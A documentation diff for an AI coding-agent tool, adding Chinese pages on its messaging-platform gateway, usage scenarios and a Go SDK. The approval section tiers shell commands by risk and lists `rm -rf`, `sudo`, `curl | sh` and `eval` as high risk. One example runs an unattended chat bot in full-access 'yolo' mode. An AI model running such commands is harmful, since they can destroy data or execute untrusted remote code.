+多 Agent 模式会注册 `subagent_*` 工具，用于委托边界清晰的任务。TUI 多 Agent 工作流中也提供 cron 命令入口。
+
+### A2A Master 模式
+
+```bash
+# 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 启用 master 模式
+vibecoding --enable-a2a-master
+```
+
+A2A Master 模式让你管理多个远程 A2A Agent，LLM 可自动通过 `a2a_dispatch` tool 分发任务。详见 [A2A 协议](a2a.md)。
+
 ## 选择模式
 
 VibeCoding 提供三种模式:
@@ -231,7 +260,7 @@ VibeCoding 可以通过 Agent Client Protocol (ACP) 集成到你的 IDE：
   "acp.agents": {
     "vibecoding": {
       "command": "vibecoding",
-      "args": ["acp", "--mode", "agent"]
+      "args": ["acp", "--mode", "agent", "--multi-agent"]
     }
   }
 }
@@ -250,6 +279,8 @@ VibeCoding 可以通过 Agent Client Protocol (ACP) 集成到你的 IDE：
 
 - 阅读 [配置详解](configuration.md) 自定义设置
 - 查看 [工具参考](tools.md) 了解可用工具
+- 尝试 [多 Agent 模式](cli-reference.md#多-agent-模式) 进行委托调查和 cron 命令入口
 - 了解 [安全模型](security.md) 保护你的系统
 - 探索 [技能系统](skills.md) 创建可复用提示片段
 - 设置 [IDE 集成](acp.md) 在 VS Code 或 JetBrains 中使用
+- 查看 [场景演示](scenarios.md) 了解各模式的实际用法
diff --git a/docs/zh/hermes.md b/docs/zh/hermes.md
new file mode 100644
index 0000000..096f287
--- /dev/null
+++ b/docs/zh/hermes.md
@@ -0,0 +1,443 @@
+# Hermes 模式
+
+## 概述
+
+Hermes 模式将 VibeCoding 作为**消息平台网关守护进程**运行，支持 WebSocket/HTTP API、微信、飞书和 A2A 协议。它将 VibeCoding 从编码助手扩展为可部署的自主代理。
+
+```bash
+vibecoding hermes start
+```
+
+## 快速开始
+
+```bash
+# 生成配置模板
+vibecoding hermes config init
+
+# 启动 hermes（前台）
+vibecoding hermes start
+
+# 启动 hermes（后台）
+vibecoding hermes start -d
+
+# 查看状态
+vibecoding hermes status
+
+# 停止 hermes
+vibecoding hermes stop
+
+# 以客户端连接
+vibecoding hermes client
+```
+
+## 架构
+
+```
+                    ┌─────────────────────────────────────┐
+                    │         Hermes 网关 (:8090)          │
+                    │                                     │
+                    │  ┌─────────┐  ┌─────────┐  ┌─────┐ │
+   微信 ───────────►│  │消息平台 │  │  HTTP   │  │ A2A │ │
+   飞书 ───────────►│  │适配器   │  │  REST   │  │     │ │
+                    │  └────┬────┘  └────┬────┘  └──┬──┘ │
+                    │       │            │          │     │
+                    │       └──────┬─────┘──────────┘     │
+                    │              ▼                       │
+                    │       ┌──────────┐                  │
+                    │       │  调度器   │                  │
+                    │       └────┬─────┘                  │
+                    │            ▼                        │
+                    │  ┌──────────────────┐               │
+                    │  │   Agent 循环     │               │
+                    │  │  (per-user)      │               │
+                    │  └──────────────────┘               │
+                    └─────────────────────────────────────┘
+```
+
+## CLI 命令
+
+### `hermes start`
+
+启动 Hermes 守护进程。
+
+| 标志 | 说明 |
+|------|------|
+| `-d` | 后台运行 |
+| `--port` | 监听端口（默认：配置值或 8090） |
+| `--work-dir` | 默认工作目录 |
+| `-p`, `--provider` | 覆盖默认 provider |
+| `-m`, `--model` | 覆盖默认 model |
+| `--multi-agent` | 启用子 Agent 工具 |
+| `--sandbox` | 启用 bwrap 沙箱 |
+| `--config` | hermes.json 路径 |
+| `--verbose` | 详细输出 |
+| `--debug` | 调试日志 |
+
+### `hermes stop`
+
+通过 PID 文件 + SIGTERM 停止运行中的 Hermes 守护进程。
+
+### `hermes status`
+
+检查 Hermes 守护进程状态（PID 检查 + HTTP health 查询）。
+
+### `hermes client`
+
+通过 WebSocket 连接到运行中的 Hermes 实例。
+
+| 标志 | 说明 |
+|------|------|
+| `--url` | WebSocket URL（默认：`ws://localhost:8090/ws`） |
+| `--session` | 要恢复的 session ID |
+
+**客户端命令：**
+- `/help` — 显示帮助
+- `/new` — 开始新 session
+- `/clear` — 清空当前 session
+- `/status` — 显示 session 状态
+- `/sessions` — 列出活跃 session
+- `/mode <mode>` — 设置模式（plan/agent/yolo）
+- `/compact` — 触发压缩
+- `/quit` — 退出
+
+### `hermes config`
+
+管理 Hermes 配置。
+
+```bash
+vibecoding hermes config init              # 创建全局配置模板
+vibecoding hermes config init --project    # 创建项目配置模板
+vibecoding hermes config show              # 查看生效配置
+```
+
+### `hermes wechat`
+
+管理微信 iLink 连接。
+
+```bash
+vibecoding hermes wechat login             # 扫码登录
+vibecoding hermes wechat login --force     # 强制重新登录
+vibecoding hermes wechat status            # 查看连接状态
+```
+
+### `hermes feishu`
+
+管理飞书连接。
+
+```bash
+vibecoding hermes feishu setup             # 显示配置指南
+vibecoding hermes feishu status            # 查看连接状态
+```
+
+### `hermes webhook`
+
+管理 webhook 路由。
+
+```bash
+vibecoding hermes webhook list             # 列出配置的路由
+```
+
+### `hermes memory`
+
+管理持久化记忆。
+
+```bash
+vibecoding hermes memory show              # 查看 memory.md 内容
+vibecoding hermes memory clear             # 重置 memory.md
+```
+
+### `hermes sessions`
+
+管理 session。
+
+```bash
+vibecoding hermes sessions list            # 列出活跃 session（查询运行实例）
+```
+
+### `hermes cron`
+
+管理定时任务。
+
+```bash
+vibecoding hermes cron list                # 列出所有定时任务
+vibecoding hermes cron add <name> <prompt> # 添加定时任务
+vibecoding hermes cron remove <id>         # 删除定时任务
+vibecoding hermes cron enable <id>         # 启用定时任务
+vibecoding hermes cron disable <id>        # 禁用定时任务
+```
+
+## 配置
+
+### `hermes.json`
+
+Hermes 模式的配置文件。支持全局 + 项目级覆盖。
+
+**位置：**
+- 全局：`<GLOBAL_DIR>/hermes.json`
+- 项目：`.vibe/hermes.json`（覆盖全局）
+
+```jsonc
+{
+  "server": {
+    "port": 8090,
+    "host": "0.0.0.0",
+    "auth_token": ""
+  },
+  "default_provider": "",
+  "default_model": "",
+  "multi_agent": false,
+  "sandbox": false,
+  "wechat": {
+    "enabled": false,
+    "cred_path": "",
+    "work_dir": "",
+    "allowed_users": [],
+    "auto_typing": true
+  },
+  "feishu": {
+    "enabled": false,
+    "app_id": "",
+    "app_secret": "",
+    "work_dir": "",
+    "allowed_users": []
+  },
+  "webhooks": {
+    "enabled": false,
+    "secret": "",
+    "routes": [
+      {
+        "path": "/github",
+        "events": ["push", "pull_request"],
+        "skill": "code-review",
+        "delivery": "feishu",
+        "delivery_target": "chat_id"
+      }
+    ]
+  },
+  "a2a": {
+    "enabled": false,
+    "port": 8093
+  },
+  "cron": {
+    "enabled": true
+  },
+  "memory": {
+    "enabled": true,
+    "path": ""
+  },
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": []
+  },
+  "hooks": {
+    "pre_tool_call": "",
+    "post_tool_call": ""
+  },
+  "agent": {
+    "max_turns": 90,
+    "budget_pressure": true,
+    "context_pressure": true,
+    "budget_pressure_threshold": 0.20,
+    "context_pressure_threshold": 0.55
+  },
+  "work_dir": "."
+}
+```
+
+### 配置优先级
+
+```
+CLI 标志 > hermes.json（项目） > hermes.json（全局） > 默认值
+```
+
+### 工作目录优先级
+
+```
+平台 work_dir（微信/飞书） > 全局 work_dir > CLI --work-dir > 当前目录
+```
+
+## 消息平台
+
+### 微信（iLink 协议）
+
+- 零外部依赖（仅 Go 标准库）
+- 扫码登录，凭证保存到 `<GLOBAL_DIR>/wechat-credentials.json`
+- 长轮询接收消息（无需公网 IP）
+- 过期自动重新登录
+- 支持打字指示器
+
+### 飞书
+
+- 官方 SDK：`github.com/larksuite/oapi-sdk-go/v3`
+- WebSocket 长连接（无需公网 IP）
+- 支持文本消息
+- 自动重连
+
+## WebSocket API
+
+### 连接
+
+```
+ws://localhost:8090/ws?session=<session_id>
+```
+
+配置 `server.auth_token` 后，应在 WebSocket 握手时通过 HTTP header 发送 token：
+
+```http
+Authorization: Bearer <auth_token>
+```
+
+旧的 `?token=` query 参数仍兼容，但推荐使用 header，避免 token 暴露在 URL 和日志中。
+
+### 客户端 → 服务端消息
+
+```jsonc
+// 聊天消息
+{"type": "message", "content": "帮我看看这段代码"}
+
+// 斜杠命令
+{"type": "command", "content": "/new"}
+
+// 审批响应
+{"type": "approval", "approval_id": "ap_xxx", "approved": true}
+
+// 心跳
+{"type": "ping"}
+```
+
+### 服务端 → 客户端消息
+
+```jsonc
+// 连接确认
+{"type": "connected", "session_id": "...", "version": "..."}
+
+// 流式文本
+{"type": "text_delta", "content": "让我帮你..."}
+
+// 思考过程
+{"type": "think_delta", "content": "分析代码..."}
+
+// 工具调用
+{"type": "tool_call", "tool": "read", "call_id": "...", "args": {"path": "main.go"}}
+
+// 工具结果
+{"type": "tool_result", "tool": "read", "call_id": "...", "result": "..."}
+
+// 文件 diff
+{"type": "tool_diff", "call_id": "...", "path": "main.go", "diff": "..."}
+
+// 审批请求（高风险）
+{"type": "approval_request", "approval_id": "ap_xxx", "tool": "bash", "args": {...}}
+
+// 用量统计
+{"type": "usage", "prompt_tokens": 1200, "completion_tokens": 350}
+
+// 轮次完成
+{"type": "done", "stop_reason": "end_turn"}
+
+// 状态消息
+{"type": "status", "message": "触发压缩"}
+
+// 命令响应
+{"type": "command_result", "command": "/new", "message": "✅ 新 session 已创建"}
+
+// 错误
+{"type": "error", "message": "provider error"}
+
+// 心跳响应
+{"type": "pong"}
+```
+
+## HTTP REST API
+
+| 端点 | 方法 | 认证 | 说明 |
+|------|------|------|------|
+| `/api/health` | GET | 否 | 健康检查 |
+| `/api/status` | GET | 是 | 服务状态 |
+| `/api/sessions` | GET | 是 | 列出活跃 session |
+| `/api/sessions/{id}` | GET | 是 | session 详情 |
+| `/api/sessions/{id}` | DELETE | 是 | 删除 session |
+| `/api/memory` | GET | 是 | 读取 memory.md |
+| `/api/memory` | PUT | 是 | 更新 memory.md |
+| `/api/platforms` | GET | 是 | 平台状态 |
+| `/webhook/*` | POST | Secret | Webhook 入站 |
+
+## 智能审批
+
+工具调用的分级风险分类：
+
+| 风险等级 | WebSocket | 消息平台 |
+|----------|-----------|----------|
+| Low | 自动批准 | 自动批准 |
+| Medium | 自动批准 + 通知 | 自动批准 + 通知 |
+| High | `approval_request` → 等待响应（5 分钟超时） | 自动拒绝 + 通知 |
+
+**风险分类：**
+- **Low**：`go`、`make`、`npm`、`git status/log/diff`、`ls`、`cat`、`grep`、`find`
+- **Medium**：`mv`、`cp -r`、`git push`、`docker`、`curl`、`ssh`
+- **High**：`rm -rf`、`sudo`、`shutdown`、`curl | sh`、`eval`、`exec`
+
+## 压力系统
+
+### Context Pressure
+
+当 context 使用率超过阈值（默认 55%）时触发 `EventContextPressure`。
+
+```jsonc
+{
+  "agent": {
+    "context_pressure": true,
+    "context_pressure_threshold": 0.55
+  }
+}
+```
+
+### Budget Pressure
+
+当剩余迭代次数达到阈值（默认 20%）时触发 `EventBudgetPressure`。
+
+```jsonc
+{
+  "agent": {
+    "budget_pressure": true,
+    "budget_pressure_threshold": 0.20
+  }
+}
+```
+
+两者都是一次性事件：每个阈值越界只触发一次，非每轮触发。
+
+## Memory
+
+持久化记忆存储为 `memory.md`（Markdown 格式，人类可读）。
+
+**查找优先级：**
+1. `memory.path` 配置 → 显式路径
+2. `.vibe/memory.md` → 项目记忆
+3. `<GLOBAL_DIR>/memory.md` → 全局记忆
+
+**Section：**
+- `## User Profile` — 用户偏好
+- `## Working Memory` — 当前上下文
+- `## Lessons Learned` — 积累的知识
+
+**默认：** 写入 `.vibe/memory.md`（项目目录）。
+
+## Session 管理
+
+- 每个 `platform:user_id` 一个持久 session
+- `/new` 归档当前 session 并创建新 session
+- Session 存储在 `<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`
+- Context 窗口满时自动压缩
+
+## A2A 协议
+
+详见 [A2A 文档](a2a.md)。
+
+## 安全
+
+- **用户白名单**：per-platform `allowed_users`
+- **Auth Token**：HTTP/WebSocket API 的 Bearer token
+- **Allowed Work Dirs**：限制工作目录
+- **Shell Hooks**：pre/post tool call 外部脚本
+- **智能审批**：分级风险分类
diff --git a/docs/zh/scenarios.md b/docs/zh/scenarios.md
new file mode 100644
index 0000000..ccdb55b
--- /dev/null
+++ b/docs/zh/scenarios.md
@@ -0,0 +1,554 @@
+# 场景演示
+
+本文档通过实际场景演示 VibeCoding 的各种使用模式。
+
+---
+
+## 场景 1：日常写代码（单 Agent 模式）
+
+最基础的使用方式——在终端中与 AI 对话，完成日常开发任务。
+
+### 环境准备
+
+```bash
+# 设置 API 密钥
+export DEEPSEEK_API_KEY=sk-...
+
+# 进入项目目录
+cd ~/projects/myapp
+```
+
+### 场景 A：代码解释
+
+```bash
+$ vibecoding "解释 internal/agent/agent.go 的核心逻辑"
+```
+
+VibeCoding 会：
+1. 加载上下文文件（`AGENTS.md`、`CLAUDE.md`）
+2. 用 `read` 读取文件
+3. 用 `ls`、`grep` 探索相关代码
+4. 输出结构化的解释
+
+### 场景 B：修复 Bug
+
+```bash
+$ vibecoding
+```
+
+```
+> 修复 handler.go 中的空指针错误
+
+[Agent]
+  📄 read("internal/handler.go", offset=45, limit=20)
+  → 发现第 52 行未检查 err 是否为 nil
+
+  📝 edit("internal/handler.go", edits=[
+    {oldText: "resp, _ := client.Do(req)", newText: "resp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}"}
+  ])
+  → 编辑成功
+
+  🔧 bash("go build ./...")
+  → 编译通过
+
+✅ 已修复：在第 52 行添加了错误检查
+```
+
+### 场景 C：添加新功能
+
+```
+> 给 HTTP handler 添加 /health 端点
+
+[Agent]
+  📄 plan(title="添加 /health 端点", steps=[
+    {title: "阅读现有 handler 结构", status: "running"},
+    {title: "添加 health handler", status: "pending"},
+    {title: "注册路由", status: "pending"},
+    {title: "添加测试", status: "pending"},
+    {title: "验证编译", status: "pending"}
+  ])
+
+  📄 read("internal/server/routes.go")
+  📝 edit(...)  # 添加 handler
+  📝 edit(...)  # 注册路由
+  🔧 bash("go test ./internal/server/ -run TestHealth")
+  🔧 bash("go build ./...")
+
+  📄 plan(..., steps=[..., {title: "验证编译", status: "done"}])
+
+✅ 完成：/health 端点已添加并测试通过
+```
+
+### 模式选择建议
+
+| 任务 | 推荐模式 | 命令 |
+|------|---------|------|
+| 阅读代码、学习项目 | `plan` | `vibecoding --mode plan` |
+| 写代码、修 bug | `agent`（默认） | `vibecoding` |
+| 安装依赖、系统操作 | `yolo` | `vibecoding --mode yolo` |
+
+---
+
+## 场景 2：非交互模式（CI/脚本集成）
+
+在 CI 流水线或脚本中使用 VibeCoding。
+
+### 场景 A：代码审查
+
+```bash
+# 在 CI 中审查 PR
+git diff main..feature | vibecoding -P "审查这个 diff，指出潜在问题"
+```
+
+### 场景 B：自动重构
+
+```bash
+# 批量重构
+vibecoding -P "将所有 fmt.Errorf 调用改为使用 %w 包装错误" --mode yolo
+```
+
+### 场景 C：生成文档
+
+```bash
+# 为包生成 README
+vibecoding -P "为 internal/cache 包生成 README.md，包括使用示例" --mode yolo
+```
+
+---
+
+## 场景 3：多 Agent 模式（复杂任务委托）
+
+通过 `--multi-agent` 启用子 Agent 工具，将复杂任务拆分并行执行。
+
+### 启动
+
+```bash
+$ vibecoding --multi-agent
+```
+
+### 场景：并行重构和测试
+
+```
+> 我需要：1) 将 internal/cache 包重命名为 internal/store
+>        2) 同时确保所有测试通过
+
+[Agent]
+  🤖 subagent_spawn(task="将 internal/cache 重命名为 internal/store，更新所有导入路径",
+                     mode="agent",
+                     tools=["read", "write", "edit", "bash", "grep", "find"])
+
+  → 返回 handle: "agent-1"
+
+  🤖 subagent_spawn(task="运行完整测试套件，报告失败的测试",
+                     mode="agent",
+                     tools=["read", "bash", "grep", "find"])
+
+  → 返回 handle: "agent-2"
+
+  ... 等待子 Agent 完成 ...
+
+  🤖 subagent_status(handle="agent-1")
+  → 状态: completed
+  → 结果: "已将 cache 包重命名为 store，更新了 15 个文件的导入路径"
+
+  🤖 subagent_status(handle="agent-2")
+  → 状态: completed
+  → 结果: "3 个测试失败：TestCacheGet, TestCacheSet, TestCacheDelete"
+
+  🤖 subagent_send(handle="agent-1", message="修复 agent-2 报告的 3 个失败测试")
+
+  ... 子 Agent 继续工作 ...
+
+✅ 完成：包已重命名，所有测试通过
+```
+
+### 子 Agent 工具汇总
+
+| 工具 | 用途 |
+|------|------|
+| `subagent_spawn` | 启动子 Agent，返回 handle |
+| `subagent_status` | 查询子 Agent 状态和结果 |
+| `subagent_send` | 向子 Agent 发送后续指令 |
+| `subagent_destroy` | 停止并清理子 Agent |
+
+### 多 Agent + Cron 定时任务
+
+```bash
+# 每天早上运行代码审查
+vibecoding hermes cron add "daily-review" \
+  "审查最近 24 小时的 git 变更，输出问题报告" \
+  --schedule "@daily"
+```
+
+---
+
+## 场景 4：VS Code ACP 集成
+
+在 VS Code 中直接使用 VibeCoding 作为 AI 编码助手。
+
+### 步骤 1：安装
+
+```bash
+npm install -g vibecoding-installer
+```
+
+### 步骤 2：配置 VS Code
+
+编辑 VS Code 的 `settings.json`：
+
+```json
+{
+  "acp.agents": {
+    "vibecoding": {
+      "command": "vibecoding",
+      "args": ["acp", "--mode", "agent", "--multi-agent"],
+      "description": "VibeCoding AI Assistant"
+    }
+  }
+}
+```
+
+### 步骤 3：使用
+
+1. 在 VS Code 中打开项目
+2. 打开 ACP 面板（通过扩展）
+3. 直接提问或请求代码更改
+
+**VS Code 中的体验：**
+
+```
+你: 将 utils.go 中的 ParseConfig 函数改为支持 YAML 格式
+
+VibeCoding:
+  [tool_call: read utils.go]
+  [tool_call: edit utils.go]
+  [tool_call: bash "go test ./..."]
+  ✅ 已添加 YAML 支持，所有测试通过
+```
+
+### ACP 模式的特殊能力
+
+| 能力 | 说明 |
+|------|------|
+| 会话管理 | IDE 自动管理会话的创建、加载、继续 |
+| 权限请求 | 高风险操作时 IDE 弹窗确认 |
+| MCP 集成 | IDE 可传入 MCP 服务器配置 |
+| 多 Agent | 通过 `--multi-agent` 启用子 Agent 工具 |
+
+---
+
+## 场景 5：A2A 独立服务器模式
+
+将 VibeCoding 作为 A2A 服务器运行，供其他 Agent 调用。
+
+### 场景 A：启动独立 A2A 服务器
+
+```bash
+# 初始化配置
+vibecoding a2a --init-a2a-config
+
+# 编辑 a2a.json（可选）
+vim ~/.vibecoding/a2a.json
+
+# 启动服务器
+vibecoding a2a start --port 8093 --work-dir ~/projects/myapp
+```
+
+### 场景 B：其他 Agent 调用
+
+```bash
+# 用 vibecoding 客户端
+vibecoding a2a send "列出项目中的所有 Go 文件" --target http://localhost:8093
+
+# 用 curl
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "运行所有测试"}]
+      }
+    },
+    "id": 1
+  }'
+
+# 发现远程 Agent 能力
+vibecoding a2a discover http://localhost:8093
+```
+
+### 场景 C：带认证的 A2A 服务器
+
+```bash
+# 启动带 Token 认证的服务器
+vibecoding a2a start --auth-token "my-secret-token-xxx"
+
+# 客户端调用时传 Token
+vibecoding a2a send "review main.go" \
+  --target http://remote-server:8093 \
+  --auth-token "my-secret-token-xxx"
+```
+
+---
+
+## 场景 6：A2A Master 模式（跨机器 Agent 调度）
+
+管理多个远程 A2A Agent，让 LLM 自动分发任务。
+
+### 架构
+
+```
+┌─────────────────────────────────────────────────────────┐
+│  本机 (VibeCoding + A2A Master)                          │
+│                                                         │
+│  vibecoding --enable-a2a-master                         │
+│  ┌─────────────────────────────────────────────────┐   │
+│  │  LLM 自动决策 → a2a_dispatch tool                │   │
+│  └─────────────────────────────────────────────────┘   │
+│           │                   │                         │
+│           ▼                   ▼                         │
+│  ┌──────────────┐   ┌──────────────┐                   │
+│  │ code-reviewer│   │  ci-agent    │                   │
+│  │ 192.168.1.10 │   │ 192.168.1.20 │                   │
+│  │ :8093        │   │ :8093        │                   │
+│  └──────────────┘   └──────────────┘                   │
+└─────────────────────────────────────────────────────────┘
+```
+
+### 步骤 1：在远程机器上启动 A2A 服务器
+
+**机器 A（代码审查 Agent）：**
+```bash
+# 192.168.1.10
+vibecoding a2a start --port 8093 --work-dir ~/projects/shared
+```
+
+**机器 B（CI Agent）：**
+```bash
+# 192.168.1.20
+vibecoding a2a start --port 8093 --work-dir ~/ci-runner --auth-token "ci-secret"
+```
+
+### 步骤 2：本机初始化 Master 配置
+
+```bash
+# 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 编辑 a2a-list.json
+vim ~/.vibecoding/a2a-list.json
+```
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://192.168.1.10:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://192.168.1.20:8093",
+      "auth_token": "ci-secret"
+    }
+  ]
+}
+```
+
+### 步骤 3：启用 Master 模式
+
+```bash
+$ vibecoding --enable-a2a-master --verbose
+```
+
+```
+A2A master mode enabled: 2 agents loaded from /home/user/.vibecoding/a2a-list.json
+
+> 帮我审查 internal/handler.go 的代码质量，然后运行测试确保没问题
+
+[Agent]
+  我需要将任务分发给两个远程 Agent：
+
+  🔧 a2a_dispatch(agent_name="code-reviewer",
+                   message="审查 internal/handler.go 的代码质量，关注错误处理、
+                           性能和安全性")
+
+  → code-reviewer 返回: "发现 3 个问题：1) 第 45 行未处理超时..."
+
+  🔧 a2a_dispatch(agent_name="ci-agent",
+                   message="运行项目的完整测试套件，报告结果")
+
+  → ci-agent 返回: "47/47 测试通过，覆盖率 82%"
+
+✅ 综合结果：
+- 代码审查发现 3 个问题（已列出详情）
+- 所有测试通过，覆盖率 82%
+- 建议优先修复第 45 行的超时处理
+```
+
+### 实际对话示例
+
+```
+> 分析项目结构，然后让审查 agent 看看有没有架构问题
+
+[Agent]
+  📄 ls(".")
+  📄 read("go.mod")
+  📄 find("*.go", maxDepth=2)
+
+  → 了解了项目结构
+
+  🔧 a2a_dispatch(agent_name="code-reviewer",
+                   message="这个 Go 项目的结构如下：[项目结构摘要]。
+                           请从架构角度分析是否有改进空间，
+                           特别关注包的职责划分和依赖关系。")
+
+  → code-reviewer: "建议：1) internal/api 和 internal/handler 存在职责重叠..."
+
+✅ 以下是架构改进建议...
+```
+
+---
+
+## 场景 7：Gateway 模式（HTTP API）
+
+将 VibeCoding 作为 OpenAI 兼容的 HTTP 服务，供其他应用调用。
+
+### 初始化和启动
+
+```bash
+# 生成配置模板
+vibecoding --init-gateway
+
+# 编辑 gateway.json（设置 token、端口等）
+vim ~/.vibecoding/gateway.json
+
+# 启动网关
+vibecoding gateway --port 8080 --work-dir ~/projects/myapp
+```
+
+### 调用
+
+```bash
+# 用 curl（OpenAI 兼容格式）
+curl http://localhost:8080/v1/chat/completions \
+  -H "Authorization: Bearer your-token" \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [
+      {"role": "user", "content": "解释这个项目的架构"}
+    ]
+  }'
+
+# 用 Python OpenAI SDK
+from openai import OpenAI
+client = OpenAI(base_url="http://localhost:8080/v1", api_key="your-token")
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "写一个 HTTP 中间件"}]
+)
+```
+
+---
+
+## 场景 8：Hermes 消息平台网关
+
+将 VibeCoding 接入微信/飞书，实现无人值守的 AI 编码助手。
+
+### 启动
+
+```bash
+# 配置 hermes.json
+vim ~/.vibecoding/hermes.json
+
+# 启动
+vibecoding hermes start
+```
+
+### 典型配置
+
+```json
+{
+  "server": { "port": 8090, "auth_token": "my-token" },
+  "platforms": {
+    "wechat": { "enabled": true },
+    "feishu": { "enabled": true, "app_id": "...", "app_secret": "..." }
+  },
+  "default_mode": "yolo",
+  "security": {
+    "smart_approvals": true,
+    "allowed_work_dirs": ["/srv/projects"]
+  },
+  "a2a": { "enabled": true },
+  "cron": { "enabled": true },
+  "memory": { "enabled": true }
+}
+```
+
+### 在消息平台中使用
+
+```
+用户: /new
+Bot:   新会话已创建
+
+用户: 帮我给 api 包添加速率限制中间件
+Bot:   [执行中...]
+       ✅ 已添加速率限制中间件，支持可配置的请求/秒限制
+       修改文件：internal/api/middleware.go, internal/api/routes.go
+
+用户: 运行测试
+Bot:   [执行 go test ./...]
+       ✅ 全部通过 (12/12)
+```
+
+---
+
+## 场景 9：组合模式（多工具协同）
+
+将多种模式组合使用，构建完整的开发工作流。
+
+### 示例：开发 + 审查 + 部署
+
+```bash
+# 1. 本地开发（TUI 模式）
+cd ~/projects/myapp
+vibecoding --mode yolo
+
+# 2. 提交前审查（Plan 模式）
+vibecoding --mode plan "审查 git diff 中的所有变更"
+
+# 3. 推送后 CI 自动审查（Gateway 模式）
+# CI 脚本中：
+curl http://gateway:8080/v1/chat/completions \
+  -d '{"messages": [{"role": "user", "content": "审查 PR #42 的代码"}]}'
+
+# 4. 定时巡检（Hermes + Cron）
+vibecoding hermes cron add "security-scan" \
+  "扫描项目中的安全漏洞和敏感信息泄露" \
+  --schedule "@weekly"
+```
+
+---
+
+## 常用命令速查
+
+| 场景 | 命令 |
+|------|------|
+| 日常编码 | `vibecoding` |
+| 只读分析 | `vibecoding --mode plan` |
+| 完全访问 | `vibecoding --mode yolo` |
+| 非交互 | `vibecoding -P "..."` |
+| 多 Agent | `vibecoding --multi-agent` |
+| A2A 服务器 | `vibecoding a2a start` |
+| A2A Master | `vibecoding --enable-a2a-master` |
+| HTTP 网关 | `vibecoding gateway` |
+| 消息平台 | `vibecoding hermes start` |
+| IDE 集成 | `vibecoding acp` |
+| 继续会话 | `vibecoding -c` |
+| 恢复会话 | `vibecoding -r <id>` |
+| 生成配置 | `vibecoding --init-gateway` |
+| 生成 A2A 配置 | `vibecoding a2a --init-a2a-config` |
+| 生成 Master 配置 | `vibecoding --init-a2a-master-config` |
diff --git a/docs/zh/sdk.md b/docs/zh/sdk.md
new file mode 100644
index 0000000..17f4ada
--- /dev/null
+++ b/docs/zh/sdk.md
@@ -0,0 +1,532 @@
+# SDK 集成指南
+
+VibeCoding 提供了一个公共 Go 包（`github.com/startvibecoding/vibecoding/agent`），允许你将 AI 编码 Agent 嵌入到自己的应用中。本指南涵盖：
+
+1. [公共 Agent 包](#公共-agent-包) — 类型、接口和 Builder API
+2. [实现自定义 Provider](#实现自定义-provider) — 接入自有 LLM 后端
+3. [构建和运行 Agent](#构建和运行-agent) — 创建 Agent 并处理事件流
+4. [事件类型](#事件类型) — 理解事件流
+5. [子 Agent 模式](#子-agent-模式) — 将任务委派给子 Agent
+
+---
+
+## 公共 Agent 包
+
+导入路径：
+
+```go
+import "github.com/startvibecoding/vibecoding/agent"
+```
+
+该包**仅包含公共类型和接口**，不依赖任何 internal 包。定义了以下核心类型：
+
+| 类型 | 说明 |
+|------|------|
+| `Agent` | 所有 Agent 实现必须满足的接口 |
+| `Provider` | LLM 后端接口 |
+| `Builder` | 流式 API，用于创建 Agent 实例 |
+| `Event` / `EventType` | Agent 事件流类型 |
+| `Message` / `ContentBlock` | 对话消息类型 |
+| `ChatParams` / `StreamEvent` | LLM 请求/响应类型 |
+| `ModelInfo` / `ModelCompat` | 模型元数据和兼容性标志 |
+| `BaseProvider` | 可嵌入的辅助类型，提供通用 Provider 方法 |
+
+### Agent 接口
+
+```go
+type Agent interface {
+    // ID 返回 Agent 的唯一标识符
+    ID() AgentID
+
+    // ParentID 返回父 Agent 的 ID，顶层 Agent 返回空值
+    ParentID() AgentID
+
+    // Run 处理用户消息并以流式方式返回事件
+    Run(ctx context.Context, userMsg string) <-chan Event
+
+    // RunWithMessages 使用显式消息历史进行处理
+    RunWithMessages(ctx context.Context, messages []Message) <-chan Event
+
+    // Abort 发送停止处理信号
+    Abort()
+
+    // GetMessages 返回当前消息历史的副本
+    GetMessages() []Message
+
+    // SetMessages 替换消息历史
+    SetMessages(msgs []Message)
+
+    // GetContext 返回当前 Agent 上下文的副本
+    GetContext() *AgentContext
+
+    // SetContext 替换 Agent 上下文
+    SetContext(ctx *AgentContext)
+
+    // GetContextUsage 返回当前上下文窗口使用情况
+    GetContextUsage() *ContextUsage
+
+    // LoadHistoryMessages 加载历史消息到 Agent 上下文
+    LoadHistoryMessages(messages []Message)
+
+    // HandleApprovalResponse 处理用户的审批响应
+    HandleApprovalResponse(approvalID string, approved bool)
+}
+```
+
+### Provider 接口
+
+```go
+type Provider interface {
+    // Chat 发送聊天请求，返回流式事件 channel
+    Chat(ctx context.Context, params ChatParams) <-chan StreamEvent
+
+    // Name 返回 Provider 名称（如 "openai"、"anthropic"）
+    Name() string
+
+    // Models 返回可用模型列表
+    Models() []ModelInfo
+
+    // GetModel 根据 ID 返回模型，未找到返回 nil
+    GetModel(id string) *ModelInfo
+}
+```
+
+---
+
+## 实现自定义 Provider
+
+要接入自有的 LLM 后端，实现 `agent.Provider` 接口即可。嵌入 `agent.BaseProvider` 可免费获得 `Name()` / `Models()` / `GetModel()` 的实现：
+
+```go
+package mybackend
+
+import (
+    "context"
+
+    "github.com/startvibecoding/vibecoding/agent"
+)
+
+type MyProvider struct {
+    agent.BaseProvider
+    apiKey string
+}
+
+func NewMyProvider(apiKey string) *MyProvider {
+    models := []agent.ModelInfo{
+        {
+            ID:            "my-model-v1",
+            Name:          "My Model V1",
+            Provider:      "mybackend",
+            ContextWindow: 128000,
+            MaxTokens:     8192,
+        },
+    }
+    return &MyProvider{
+        BaseProvider: agent.NewBaseProvider("mybackend", models),
+        apiKey:       apiKey,
+    }
+}
+
+func (p *MyProvider) Chat(ctx context.Context, params agent.ChatParams) <-chan agent.StreamEvent {
+    ch := make(chan agent.StreamEvent, 100)
+
+    go func() {
+        defer close(ch)
+
+        // 1. 发送 StreamStart
+        ch <- agent.StreamEvent{Type: agent.StreamStart}
+
+        // 2. 调用你的 LLM API，流式返回响应...
